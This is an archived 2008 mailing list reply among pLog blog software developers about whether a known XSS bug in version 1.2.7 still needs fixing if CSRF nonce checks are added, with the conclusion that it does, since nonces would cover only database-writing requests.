[pLog-svn] xss in 1.2.7
Reto Hugi
plog at hugi.to
Tue May 6 03:17:07 EDT 2008
Jon Daley wrote:
> I must really not be getting XSS then. If every post has to have a
> token on it, how would someone guess the token in order to have the
> javascript be accepted and displayed on the screen at all? I'd expect
> the token to be checked first, and simply die() if it doesn't match.
> I can't figure out a scenario where an attacker would be able to get
> javascript displayed on the screen to be executed within the context of
> that domain to steal a cookie, or do anything.
>
Jon, you're right on that very example. But I suppose we won't implement
the CSRF Check (i.e. the nonce check) on every request, but only on the
ones writing to the database (that's where CSRF is the most dangerous).
And therefore we still need to make sure we are not vulnerable to xss.
it was probably good to have this discussed once again. it's the only
way we all get the same understanding of those attacks :)
@matt: or do you see a possibility of exploiting our xss vuln. *if* we
had implemented the nonce on every request (that's the scenario jon is
thinking about...)
More information about the pLog-svn
mailing list